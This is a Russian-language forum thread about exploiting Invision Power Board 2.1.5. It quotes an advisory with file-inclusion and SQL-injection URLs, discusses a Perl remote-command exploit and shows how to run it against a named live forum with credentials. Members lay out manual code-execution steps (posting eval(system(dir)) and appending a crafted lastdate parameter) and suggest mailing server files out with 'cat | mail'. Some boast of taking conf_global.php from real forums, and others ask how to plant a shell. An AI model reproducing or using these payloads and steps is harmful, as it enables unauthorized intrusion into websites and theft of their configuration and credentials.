![]() |
Уязвимость Invision Power Board 2.1.5
Программа: Invision Power Board
Уязвимые версии: 2.1.5 и, возможно, более ранние версии Тип: remote Опасность: высокая Описание -> 1. Выполнение произвольного кода возможно из-за недостаточной фильтрации входящих от пользователя данных. Злонамеренный пользователь может сформировать текст сообщения, а затем выполнить произвольный код. 2. Подключение произвольных файлов возможно при наличии администраторских прав. Пример: _http://host/admin.php?adsess=…§ion=content&act=msubs&cod e=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test*[/url] 3. SQL-инъекция в файле sources/lib/func_taskmanager.php Злонамеренный пользователь может сформировать и выполнить произвольный запрос в базе данных (длина запроса не должна превышать 32 символа). Пример: _http://www.host.com/index.php?act=task&ck=' Решение: решения в настоящий момент не существует Источник: spam_(at)_we11er.co.uk SQL-инъекция работает, жаль ограничение 32 символа =( |
А про пункт 1 подробности есть? Или это всё про тот же известный Xss ?
|
Я не шибко понимаю в Sql. Какой нибудь толк от скуль иньекции есть этой? Ограничение есть ведь :(
|
вот здесь по подробней, надо пробовать
http://www.securityfocus.com/archive.../30/0/threaded |
## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5 ## tested on 2.1.4, 2.0.2 Код:
#!/usr/bin/perl |
Rst/ghc опять порадовали нас свойми сплойтами и как всагда там какойнибудь сюрприз :)
|
да он есть 100% ) нужно копаться в коде)
|
у меня всё ок,почти тока когда надо выполнять команду,ввожу и всё равно ничего =)),сейчас буду пробывать на других форумах
Код:
[~] TARGET : 0 - IPB 2.0.*и ещё очень часто: Код:
[~] Login ... [ DONE ] |
В сплоите в 95 строке есть зашифрованая в charsete ссылка _http://rst.void.ru/r57ipbinc.txt с содержимым
Код:
<? |
Очень даже хорошо работает exploit! Проверил на lineageii.ru.
|
да отлично работает =))) просто не на всех форумах
|
Описание баги http://www.securityfocus.com/archive.../30/0/threaded
Ручками тоже работает замечательно. |
Так я не пойму, есть шифровка в сплойте или нет!?
|
|
Хм... У меня сплойт пишет
[~] Create new message ... [ FILED ] На форуме появляется новая тема с мессагой. В сообщении эта самая шифровка из 95 строки. |
с шифровкой понятно, идем по линку, и по идее из того текстовика нужно вставить код в сплоит, чет не выходит, у кого получилось?
|
на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
|
На команды нету ответа...чё за нах?
Вот видео: http://globalka.narod.ru/exp.rar |
а если адресс форума не www.***/forum а www.forum.***.ru то как прописать?
|
-h www.forum.***.ru -d /
|
Цитата:
|
А это какой командой если не секрет ?
например cat имя_файла| mail твоё_мыло |
Оппа.. забавно..
А Shell в папку Uploads у меня не залился.. Или опять всё из-за врождённой криворукости ? |
Цитата:
Токо странно, почему не всегда получается выполнять команды, хотя я на 100% уверен, что форум не пропатчен. Иногда бывает ещё, что вместо того, чтобы вывести результат команды(например того-же ls -la), он мне выводит html код страницы. Странно всё это... |
А по моему правильно ls -lia
Команда put запрещена для анонимов как известно.. А другой я не знаю.. Какой командой залить шелл если это вообще можно сделать |
инфа для админов:
Чтобы пофиксить данную багу, зайдите на http://ibresource.ru/ Там уже есть заплатки, которые можно скачать. В частности, >> здесь << |
dasNICK, неважно, как .. ls -la; или ls- lia. Можно вообще просто ls.
-la - это просто параметры. |
Знаю.. просто действительно ls -la не работет у меня а ls -lia пашет
|
Цитата:
малчык тыбэ скока лэт? изучи команды cmd сначала.. dir пробуй.. если получиться значит точно надо учить.. |
Может кто даст наводку как исправить сплойт, а то с перлом не очень дружу ((
Или в личку если нехотите писать тут, всем кто поможет + ) |
А что у тебя не пашет ?
|
Вот цитата с dl
Цитата:
|
Цитата:
1. Постим сообщение eval(system(dir)); //' 2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts 3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00 4. Enter. Выполняется dir. |
чо вы все прицепились к сплойту а? он рабочий, на 2.1.* может иногда не работать.
для тренировки попробуйте -h resa.ipbhost.com -d / -l Des -p 123 -f 48 -v 0 |
Цитата:
|
У меня всё отлично пашет.. Сплоит исправил.. НО !
Кто знает как залить shell ??? put , get и прочее запрещены для анонимнгого доступа. Подскажите команду которой это можно мделать |
Цитата:
|
Эммм.. туплю конечно, но этих команд не знаю..
шел на C: как залить в аплоадс ? )) |
Цитата:
|
Цитата:
|
| Время: 01:28 |